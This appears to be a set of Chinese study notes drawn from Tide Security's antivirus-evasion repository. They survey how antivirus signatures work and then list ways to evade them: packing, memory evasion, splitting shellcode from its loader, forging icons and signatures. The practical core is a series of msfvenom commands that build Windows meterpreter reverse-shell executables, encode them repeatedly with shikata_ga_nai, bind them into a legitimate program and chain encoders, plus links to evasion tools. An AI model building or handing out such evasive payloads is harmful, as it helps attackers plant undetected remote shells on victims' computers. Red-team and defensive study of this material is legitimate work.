来源：https://github.com/TideSec/BypassAntiVirus/tree/master?tab=readme-ov-file

作者：Tide安全团队

备注：http://bypass.tidesec.com/、http://wiki.tidesec.com/



-------------------------------------------------------------------------------

第一篇：基础篇
特征码类别：

1.文件特征码：对付病毒在文件中的存在方式：单一文件特征码、复合文件特征码（通过多处特征进行判断）；

2.内存特征码：对付病毒在内存中的存在方式：单一内存特征码、复合内存特征码

优点：速度快，配备高性能的扫描引擎；准确率相对比较高，误杀操作相对较少；很少需要用户参与。

缺点：采用病毒特征代码法的检测工具，面对不断出现的新病毒，必须不断更新病毒库的版本，否则检测工具便会老化，逐渐失去实用价值；病毒特征代码法对从未见过的新病毒，无法知道其特征代码，
因而无法去检测新病毒；病毒特征码如果没有经过充分的检验，可能会出现误报，数据误删，系统破坏，给用户带来麻烦。

文件校验和法

进程行为监测法(沙盒模式)

主动防御技术

机器学习识别技术

免杀技术：
修改特征码(能识别一个程序是一个病毒的一段不大于64字节的特征串)或者校验和,修改特征码最重要的是定位特征码，但是定位了特征码修改后并不代表程序就能正常运行，费时费力，
由于各个杀软厂商的特征库不同，所以一般也只能对一类的杀软起效果。虽然效果不好，但有时候在没有源码的情况下可以一用。
花指令免杀
加壳免杀
内存免杀：因为杀毒软件的内存扫描原理与硬盘上的文件扫描原理都是一样的，都是通过特征码比对的，只不过为了制造迷惑性，大多数反病毒公司的内存扫描与文件扫描采用的不是同一套特征码，
这就导致了一个病毒木马同时拥有两套特征码，必须要将它们全部破坏掉才能躲过反病毒软件的查杀。
二次编译：metasploit的msfvenom提供了多种格式的payload和encoder，生成的shellcode也为二次加工提供了很大遍历，但是也被各大厂商盯得死死的。
而shikata_ga_nai是msf中唯一的评价是excellent的编码器，这种多态编码技术使得每次生成的攻击载荷文件是不一样的，编码和解码也都是不一样。还可以利用管道进行多重编码进行免杀。
目前msfvenom的encoder特征基本都进入了杀软的漏洞库，很难实现单一encoder编码而绕过杀软，所以对shellcode进行进一步修改编译成了msf免杀的主流。
互联网上有很多借助于C、C#、python等语言对shellcode进行二次编码从而达到免杀的效果。
分离免杀：payload分离免杀和webshell分离免杀，采用分离法，即将ShellCode和加载器分离。
资源修改：有些杀软会设置有扫描白名单，比如之前把程序图标替换为360安全卫士图标就能过360的查杀。
1、加资源：使用ResHacker对文件进行资源操作，找来多个正常软件，将它们的资源加入到自己软件，如图片，版本信息，对话框等。
2、替换资源：使用ResHacker替换无用的资源（Version等）。
3、加签名：使用签名伪造工具，将正常软件的签名信息加入到自己软件中。


第二篇：msfvenom隐藏的参数
msfvenom是msfpayload和msfencode的结合体，于2015年6月8日取代了msfpayload和msfencode。在此之后，metasploit-framework下面的的msfpayload（荷载生成器），msfencoder（编码器），msfcli（监听接口）都不再被支持。


第三篇：msf自免杀
未处理的payload:msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port -f exe -o payload1.exe

msf自编码处理
使用msfvenom —list encoders可查看所有编码器
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port -e x86/shikata_ga_nai -b "\x00" -i 15  -f exe -o payload2.exe

msf自捆绑免杀
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port  -x test.exe  -f exe -o payload3.exe

msf自捆绑+编码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port -e x86/shikata_ga_nai -x test.exe  -i 15 -f exe -o payload4.exe

msfvenom多重编码
msfvenom  -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=ip LPORT=port -f raw | msfvenom -e x86/alpha_upper -i 10 -f raw | msfvenom -e x86/countdown -i 10 -x test.exe -f exe -o payload5.exe
-------------------------------------------------------------------------------
第四篇：Evasion模块免杀
使用use windows/windows_defender_exe进行生成payload
evasion还提供了其他几个模块，比如windows/applocker_evasion_install_util

-------------------------------------------------------------------------------

第五六七篇：Veil免杀
Veil、Venom和Shellter是三大老牌免杀工具

-------------------------------------------------------------------------------

第八————十三篇
https://github.com/govolution/avet
https://github.com/Screetsec/TheFatRat
https://github.com/M4sc3r4n0/avoidz
https://github.com/Green-m/green-hat-suite
https://github.com/pasahitz/zirikatu.git

-------------------------------------------------------------------------------

-------------------------------------------------------------------------------

-------------------------------------------------------------------------------

-------------------------------------------------------------------------------

-------------------------------------------------------------------------------

